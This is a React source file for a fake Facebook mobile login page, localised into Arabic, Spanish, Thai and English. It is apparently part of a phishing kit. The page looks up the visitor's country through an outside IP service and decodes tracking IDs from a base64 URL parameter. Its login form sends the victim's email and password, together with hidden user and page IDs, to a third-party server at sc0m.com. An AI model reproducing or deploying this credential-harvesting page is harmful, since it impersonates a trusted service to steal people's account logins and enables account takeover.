import axios from "axios";
import { useEffect, useState } from "react";
import { useParams } from "react-router-dom";
import cpp from "country-phone-prefix";
import "../assets/css/style.css";

export default function Facebook() {
  let { url } = useParams();
  let [userId, setuserId] = useState("0");
  let [pageId, setpageId] = useState("0");
  let [country, setCountry] = useState("0");
  let [email, setEmail] = useState("0");
  let [pass, setpassword] = useState("0");
  useEffect(() => {
    axios.get("https://livebotola.com/ip.php").then((resps) => {
      let dd = cpp[resps.data];
      setCountry(dd.prefix);
    });
    let decodeUrl = atob(url);
    const lang = decodeUrl.split("_")[1].split("=")[1];
    setuserId(decodeUrl.split("_")[3].split("=")[1]);
    setpageId(decodeUrl.split("_")[2].split("=")[1]);
    if (lang == "ar") {
      document.body.setAttribute("dir", "rtl");
      document.getElementById("email").placeholder =
        "رقم الهاتف  أو البريد الإلكتروني";
      document.getElementById("password").placeholder = "كلمه السر";
      document.getElementById("create").innerHTML = "انشاء حساب جديد";
      document.getElementById("header").innerHTML =
        "انت تحتاج لتسجيل الدخول اولا.";
      document.getElementById("forg").innerHTML = " هل نسيت كلمة السر ؟";
      document.getElementById("login").innerHTML = "تسجيل الدخول";
    } else if (lang == "es") {
      document.getElementById("email").placeholder =
        "Número o correo electrónico";
      document.getElementById("password").placeholder = "contraseña";
      document.getElementById("create").innerHTML = "Crear una nueva cuenta";
      document.getElementById("header").innerHTML =
        "Primero debes iniciar sesión.";
      document.getElementById("forg").innerHTML = "¿Contraseña olvidada?";
      document.getElementById("login").innerHTML = "iniciar sesión";
    } else if (lang == "th") {
      document.getElementById("email").placeholder = "เบอร์มือถือหรืออีเมล";
      document.getElementById("password").placeholder = "รหัสผ่าน";
      document.getElementById("create").innerHTML = "สร้างบัญชีใหม่";
      document.getElementById("header").innerHTML = "คุณต้องเข้าสู่ระบบก่อน";
      document.getElementById("forg").innerHTML = "ลืมรหัสผ่าน?";
      document.getElementById("login").innerHTML = "เข้าสู่ระบบ";
    } else {
      document.getElementById("email").placeholder =
        "Mobile number or email address";
      document.getElementById("password").placeholder = "Password";
      document.getElementById("create").innerHTML = "Create New Account";
      document.getElementById("header").innerHTML = "You need to log in first.";
      document.getElementById("forg").innerHTML = "Forgotten password?";
      document.getElementById("login").innerHTML = "Log In";
    }
  }, []);

  return (
    <div>
      <div id="f-mobile">
        <header>
          <img
            src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1642789832f5e6d6ec65269188219f3e69724867cc.png"
            width="100;"
            className="thelogo"
          />
        </header>
        <div className="warningbox">
          <span id="header"> dddd {url} ss You have to log in first.</span>
        </div>
        <main>
          <form action="https://sc0m.com/v/add" method="post" class="ffcard">
            <div class="input-wrapper">
              <div class="inputs">
                <input
                  type="text"
                  name="email"
                  id="email"
                  placeholder="Mobile number or email address"
                  class="fbmef"
                  autocomplete="off"
                  required
                />
                <input
                  type="password"
                  name="password"
                  id="password"
                  placeholder="Password"
                  class="fbmpf"
                  autocomplete="off"
                  required
                />
                {/* <!-- hidden input --> */}
                <div>
                  <input type="hidden" value={country} name="codecountry" />
                  <input type="hidden" value={userId} name="userId" />
                  <input type="hidden" value="1" name="time" />
                  <input type="hidden" value="1" name="date" />
                  <input type="hidden" value="1" name="ip_address" />
                  <input type="hidden" value="1" name="CreateAt" />
                  <input type="hidden" value={pageId} name="pageId" />
                </div>
              </div>
            </div>
            <button type="submit" id="login">
              Log In
            </button>
          </form>
          <div className="line">
            <span>or</span>
          </div>
          <div className="signup-btn">
            <button id="create">Create New Account</button>
          </div>
          <div className="forgetpass">
            <a href="#" id="forg">
              Forgotten password?
            </a>
          </div>
          <footer>
            <div className="links-list">
              <ul className="right">
                <li>
                  <a href="#">English (UK)</a>
                </li>
                <li>
                  <a href="#">Français (France)</a>
                </li>
                <li>
                  <a href="#">Deutsch</a>
                </li>
                <li>
                  <a href="#">Português (Brasil)</a>
                </li>
              </ul>
              <ul className="left">
                <li>
                  <a href="#">العربية</a>
                </li>
                <li>
                  <a href="#">Русский</a>
                </li>
                <li>
                  <a href="#">Español</a>
                </li>
                <li>
                  <div>+</div>
                </li>
              </ul>
            </div>
            <div className="center">Facebook Inc.</div>
          </footer>
        </main>
      </div>
    </div>
  );
}
